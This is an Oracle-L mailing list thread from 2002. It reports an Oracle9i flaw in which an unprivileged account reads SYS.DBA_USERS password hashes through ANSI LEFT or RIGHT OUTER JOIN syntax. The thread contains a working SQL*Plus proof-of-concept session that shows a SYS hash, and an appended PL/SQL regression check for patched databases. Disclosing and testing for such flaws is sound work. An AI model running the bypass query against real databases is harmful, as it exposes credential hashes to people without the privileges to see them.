Oracle-L: RE: Major Security Canyon in 9i!!!!!!
Ahhh.... I was at IOUG-A and didn't see it.... Don't remember seeing it in the MOUNTAIN (!) of messages posted here while I was gone...
But anyway, just trying to do my duty as a good Oracle citizen of the world! :-))
RF
-----Original Message-----
Sent: Wednesday, April 24, 2002 4:17 PM
To: ORACLE-L_at_fatcity.com
Cc: Freeman, Robert
Robert,
Jonathan Lewis posted this security issue last week.
Jared
"Freeman, Robert " <Robert_Freeman_at_csx.com>
Sent by: root_at_fatcity.com
04/24/2002 10:23 AM
Please respond to ORACLE-L
To: Multiple recipients of list ORACLE-L <ORACLE-L_at_fatcity.com>
cc:
Subject: Major Security Canyon in 9i!!!!!!
This was posted on Quest/RevealNet's DBA Pipeline (by Andrew Simkovsky)... Sounds like a major security issue. I have tested this on 9.0.1.2 and it is a real issue:
Someone recently sent me some information regarding a possible security flaw with Oracle's ANSI-compliant outer join syntax in Oracle9i. Apparently, an unprivileged user can view any data they want if they use either LEFT OUTER JOIN or RIGHT OUTER JOIN. Here is an example:
SQL*Plus: Release 9.0.1.0.1 - Production on Tue Apr 16 15:16:45 2
(c) Copyright 2001 Oracle Corporation. All rights reserved.
Connected to:
Oracle9i Enterprise Edition Release 9.0.1.1.1 - Production
With the Partitioning option
JServer Release 9.0.1.1.1 - Production
SQL> connect / as sysdba
Connected.
SQL> CREATE USER us1 IDENTIFIED BY us11;
User created.
SQL> Grant Create Session to us1;
Grant succeeded.
SQL> connect us1/us11;
Connected.
SQL> select a.username, a.password
2 from sys.dba_users a left outer join sys.dba_users b on
3 b.username = a.username
4 ;
USERNAME                       PASSWORD
------------------------------ ------------------------------
SYS                            D4C5016086B2DC6A
I have tested this on my 9i database and found it to be true only for LEFT OUTER JOIN and RIGHT OUTER JOIN. There is no issue with FULL OUTER JOIN, or any of the other ANSI-compliant SQL.
Here is Oracle's response:
Thanks,
Oracle Support
--
Please see the official ORACLE-L FAQ: http://www.orafaq.com
--
Author: Freeman, Robert
INET: Robert_Freeman_at_csx.com
Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051
San Diego, California -- Public Internet access / Mailing Lists
--------------------------------------------------------------------
To REMOVE yourself from this mailing list, send an E-Mail message to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).
Received on Wed Apr 24 2002 - 16:23:38 CDT
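As an added example (not part of the original thread or of Oracle's code): a regression check a DBA can run after patching, which creates a throwaway CREATE SESSION-only account and probes SYS.DBA_USERS through each join form the thread discusses; on a fixed database every probe should fail with ORA-00942. The account name chk_oj and its password are constructed for this script.

```sql
-- Added example: verify that a CREATE SESSION-only account cannot read
-- SYS.DBA_USERS via plain SELECT, LEFT/RIGHT/FULL OUTER JOIN.
-- Run in SQL*Plus while connected as a DBA. chk_oj is a constructed test account.
CREATE USER chk_oj IDENTIFIED BY chk_oj_tmp;
GRANT CREATE SESSION TO chk_oj;

CONNECT chk_oj/chk_oj_tmp
SET SERVEROUTPUT ON

DECLARE
  -- Each probe must raise ORA-00942 for an unprivileged user.
  -- A probe that returns a count means the privilege check was bypassed.
  TYPE t_sql IS TABLE OF VARCHAR2(400);
  probes t_sql := t_sql(
    'SELECT COUNT(*) FROM sys.dba_users',                      -- control: plain select
    'SELECT COUNT(*) FROM sys.dba_users a LEFT OUTER JOIN sys.dba_users b '
      || 'ON b.username = a.username',
    'SELECT COUNT(*) FROM sys.dba_users a RIGHT OUTER JOIN sys.dba_users b '
      || 'ON b.username = a.username',
    'SELECT COUNT(*) FROM sys.dba_users a FULL OUTER JOIN sys.dba_users b '
      || 'ON b.username = a.username');
  n      PLS_INTEGER;
  leaks  PLS_INTEGER := 0;
BEGIN
  FOR i IN 1 .. probes.COUNT LOOP
    BEGIN
      EXECUTE IMMEDIATE probes(i) INTO n;
      leaks := leaks + 1;                       -- query succeeded: dictionary exposed
      DBMS_OUTPUT.PUT_LINE('LEAK   : ' || probes(i) || ' -> ' || n || ' rows');
    EXCEPTION
      WHEN OTHERS THEN
        IF SQLCODE = -942 THEN                  -- ORA-00942: expected for this account
          DBMS_OUTPUT.PUT_LINE('blocked: ' || probes(i));
        ELSE
          RAISE;                                -- anything else is a real error
        END IF;
    END;
  END LOOP;
  DBMS_OUTPUT.PUT_LINE(CASE WHEN leaks = 0 THEN 'PASS' ELSE 'FAIL' END
                       || ': ' || leaks || ' probe(s) bypassed the privilege check');
END;
/

-- Clean up the throwaway account.
CONNECT / AS SYSDBA
DROP USER chk_oj CASCADE;
```

On a 9.0.1.x database showing the behaviour reported above, the LEFT and RIGHT OUTER JOIN probes print a row count and the script ends with FAIL; after the fix all four print "blocked".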